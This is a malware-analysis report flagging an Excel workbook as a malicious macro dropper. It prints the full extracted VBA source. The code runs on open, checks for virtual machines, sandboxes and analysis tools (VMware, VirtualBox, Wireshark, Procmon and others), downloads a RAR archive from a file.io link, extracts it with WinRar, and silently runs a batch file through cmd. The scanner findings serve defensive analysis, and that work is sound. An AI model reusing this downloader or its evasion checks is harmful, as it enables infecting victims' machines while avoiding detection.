MALICIOUS
Risk Score: 570
Heuristics: 14
- VBA project inside OOXML (medium; 11 related findings) [OOXML_VBA]
  Document contains a VBA project — VBA macros present.
- Potential Shell call in VBA (critical) [OLE_VBA_SHELL]
  Matched line in script: `RarIt = Shell(WinRarPath & "WinRar.exe e " & Source & " " & Desti, vbNormalFocus)`
- WScript.Shell usage (critical) [OLE_VBA_WSCRIPT]
  Matched line in script: `Set oShell = CreateObject("Wscript.Shell")`
- Obfuscated VBA Shell command with URL (critical) [OLE_VBA_OBFUSCATED_SHELL_URL]
  VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
  Matched line in script: `Set oShell = CreateObject("Wscript.Shell")`
- VBA stages a PowerShell/LOLBin download-and-run command (critical) [OLE_VBA_BITSTRANSFER_DROPPER]
  The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it, either by writing it to a script file and running it or by launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
  Matched line in script: `Private Sub auto_open()`
- VBA WMI Win32_Process launcher (critical) [OLE_VBA_WMI_PROCESS_CREATE]
  VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  Matched line in script: `Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")`
- VBA downloads and writes a file to disk (critical) [OLE_VBA_HTTP_DROP_EXEC]
  VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-and-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script: `oStream.Write WinHttpReq.ResponseBody`
- CreateObject call (high) [OLE_VBA_CREATEOBJ]
  Matched line in script: `Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")`
- GetObject call (high) [OLE_VBA_GETOBJ]
  Matched line in script: `Set ws = GetObject("winmgmts:\\.\root\cimv2")`
- cmd.exe reference in VBA (high) [OLE_VBA_CMD]
  Matched line in script: `strArgs = "cmd /c D:\teste\teste.bat"`
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
  Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Auto_Open macro (low) [OLE_VBA_AUTO]
  Matched line in script: `Private Sub auto_open()`
- Macro/content-enable lure (medium) [SE_ENABLE_LURE]
  Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL (info) [EMBEDDED_URL]
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: https://file.io/ET2uPm1mbPS6 (referenced by macro)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

Artifact: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 12523 bytes
SHA-256: 487d85cd94a5c48a59301109a16a87b826b8c2810c4892703c5a2df12b68d4ba

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "EstaPasta_de_trabalho"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Plan1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Plan2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Plan3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Módulo1"
Attribute VB_Name = "Módulo2"
Private Sub auto_open()
On Error Resume Next
MsgBox "lol"
checkRecentDocs
checkNbrOfTask
checkTasks
checkZoneIdentifier
checkPartOfDomain
checkBios
checkPnP
checkUsername
checkFilenameHash
checkFilenameBad
checkPreciseFileName
checkCores
checkAppCount
checkApps
mark
Macro2
End Sub
Sub downloadFile(url As String, filePath As String)
Dim WinHttpReq As Object, attempts As Integer
attempts = 3
On Error GoTo TryAgain
TryAgain:
attempts = attempts - 1
Err.Clear
If attempts > 0 Then
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", url, False
WinHttpReq.Send
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.ResponseBody
oStream.SaveToFile filePath, 2 ' 1 = no overwrite, 2 = overwrite
oStream.Close
End If
End If
End Sub
Sub downloadFile_(url As String, fileOutPath As String)
Dim WinHttpReq As Object, oStream As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", url, False
WinHttpReq.Send
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.ResponseBody
oStream.SaveToFile fileOutPath, 1 ' 1 = no overwrite, 2 = overwrite
oStream.Close
End If
End Sub
Private Sub XORIt(ByRef Text As String, ByRef key As String)
Dim l As Long
Dim lonLenKey As Long, lonKeyPos As Long
lonLenKey = Len(key)
For l = 1 To Len(Text)
lonKeyPos = lonKeyPos + 1
If lonKeyPos > lonLenKey Then lonKeyPos = 1
Mid$(Text, l, 1) = Chr$(Asc(Mid$(Text, l, 1)) Xor Asc(Mid$(key, lonKeyPos, 1)))
Next l
End Sub
Sub Macro2()
Dim arr() As Integer
For iCount = 1 To 3000
ReDim Preserve arr(iCount)
arr(iCount) = iCount
Debug.Print arr(iCount)
Next iCount
For Each element In arr
If element = 2500 Then
Dim path As String
Dim path_ As String
MkDir "D:\teste"
downloadFile_ "https://file.io/ET2uPm1mbPS6", "D:\teste\jjj.rar"
UnWinRarIt
Set oShell = CreateObject("Wscript.Shell")
Dim strArgs
strArgs = "cmd /c D:\teste\teste.bat"
oShell.Run strArgs, 0, False
MsgBox "CPF'S LIVE:"
End If
Next
End Sub
Sub UnWinRarIt()
Dim WinRarPath As String 'WinRar.exe location
Dim RarIt As String 'Command line instruction
Dim SourceDir As String 'The source directory
Dim SourceRarFile As String 'The source file
Dim Source As String 'The Source Rar path (sourceDir+SourceRarfile)
Dim Desti As String 'The destination path of unRar
WinRarPath = "C:\Program Files\WinRar\"
SourceDir = "D:\teste"
SourceRarFile = "jjj.rar"
Source = SourceDir & "\" & SourceRarFile
Desti = "D:\teste\"
RarIt = Shell(WinRarPath & "WinRar.exe e " & Source & " " & Desti, vbNormalFocus)
End Sub
Public Sub checkApps()
printMsg "[*] WordBasic.AppGetNames ..."
d = False
tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
Set ws = GetObject("winmgmts:\\.\root\cimv2")
Dim names() As String
ReDim names(WordBasic.AppCount())
WordBasic.AppGetNames names
For Each n In names
For Each tn In tns
If InStr(LCase(n), tn) > 0 Then
d = True
End If
Next
Next
If d Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkAppCount()
printMsg "[*] Checking WordBasic.AppCount() ..."
If WordBasic.AppCount() < 50 Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkPreciseFileName()
printMsg "[*] Checking Precise Filename ..."
badName = False
If ActiveDocument.Name <> "Pafish.docm" Then
badName = True
End If
If badName Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkFilenameHash()
printMsg "[*] Checking Filename Hashname ..."
hexchars = "0123456789abcdef"
c = 0
For i = 1 To Len(ThisDocument.Name)
s = Mid(LCase(ThisDocument.Name), i, 1)
If InStr(s, hexchars) > 0 Then
c = c + 1
End If
Next
If c >= (Len(ThisDocument.Name) - 5) Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkFilenameBad()
printMsg "[*] Checking Bad Filename ..."
badName = False
badNames = Array("malware", "myapp", "sample", ".bin", "mlwr_", "Desktop")
For Each n In badNames
If InStr(LCase(ActiveDocument.FullName), n) > 0 Then
badName = True
End If
Next
If badName Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkTasks()
printMsg "[*] Checking Application.Tasks.Name ..."
badTask = False
badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler")
For Each Task In Application.Tasks
For Each badTaskName In badTaskNames
If InStr(LCase(Task.Name), badTaskName) > 0 Then
badTask = True
End If
Next
Next
If badTask Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkCores()
printMsg "[*] Checking Win32_Processor.NumberOfCores ..."
badCores = 0
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
For Each objItem In colItems
If objItem.NumberOfCores < 3 Then
badCores = True
End If
Next
If badCores Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkBios()
printMsg "[*] Checking Win32_Bios.SMBIOSBIOSVersion & SerialNumber ..."
badBios = False
badBiosNames = Array("virtualbox", "vmware", "kvm")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Bios", , 48)
For Each objItem In colItems
For Each badName In badBiosNames
If InStr(LCase(objItem.SMBIOSBIOSVersion), badName) > 0 Then
badBios = True
End If
If InStr(LCase(objItem.SerialNumber), badName) > 0 Then
badBios = True
End If
Next
Next
If badBios Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkPnP()
printMsg "[*] Checking Win32_PnPEntity.DeviceId ..."
badPNP = False
badPNPNames = Array("VEN_80EE", "VEN_15AD")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_PnPEntity", , 48)
For Each objItem In colItems
For Each badName In badPNPNames
If InStr(LCase(objItem.DeviceId), badName) > 0 Then
badPNP = True
End If
Next
Next
If badPNP Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkUsername()
printMsg "[*] Checking Win32_ComputerSystem.Username ..."
badUsername = False
badUsernames = Array("admin", "malfind", "sandbox", "test")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
For Each objItem In colItems
For Each badName In badUsernames
If InStr(LCase(objItem.UserName), badName) > 0 Then
badUsername = True
End If
Next
Next
If badUsername Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkPartOfDomain()
printMsg "[*] Checking Win32_ComputerSystem.PartOfDomain ..."
partOfDomain = False
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
For Each objItem In colItems
If objItem.partOfDomain Then
partOfDomain = True
End If
Next
If partOfDomain Then
printMsg "OK"
Else
printMsg "DETECTED"
End If
End Sub
Public Sub checkZoneIdentifier()
printMsg "[*] Checking Zone.Identifier ..."
If CreateObject("Scripting.FileSystemObject").FileExists(ThisDocument.path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
printMsg "OK"
Else
printMsg "DETECTED"
End If
End Sub
Public Sub checkNbrOfTask()
printMsg "[*] Checking Application.Tasks.Count ..."
If Application.Tasks.Count < 3 Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Sub checkRecentDocs()
printMsg "[*] Checking Application.RecentFiles.Count ..."
If Application.RecentFiles.Count < 3 Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Sub
Public Function printMsg(msg)
ActiveDocument.Range.Text = ActiveDocument.Range.Text & msg
Set objFSO = CreateObject("Scripting.FileSystemObject")
outFile = "pafish.log"
Set objFile = objFSO.CreateTextFile(outFile, True)
objFile.Write ActiveDocument.Range.Text & msg
objFile.Close
End Function
Public Sub mark()
Text = ActiveDocument.Range.Text
toks = Split(Text, vbCr)
c = 0
For Each tok In toks
l = Len(tok)
If tok = "OK" Then
ActiveDocument.Range(c, c + l).Font.Color = vbGreen
End If
If tok = "DETECTED" Then
ActiveDocument.Range(c, c + l).Font.Color = vbRed
End If
c = c + l + 1
Next
ActiveDocument.Range.ParagraphFormat.SpaceBefore = 0
ActiveDocument.Range.ParagraphFormat.SpaceAfter = 0
ActiveDocument.Range.Font.Size = 8
End Sub
Artifact: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 77312 bytes
SHA-256: d170504c88e57303a88f6f3d343bb8f543d9bbdbf02f25c7ed86e3b7693e4c73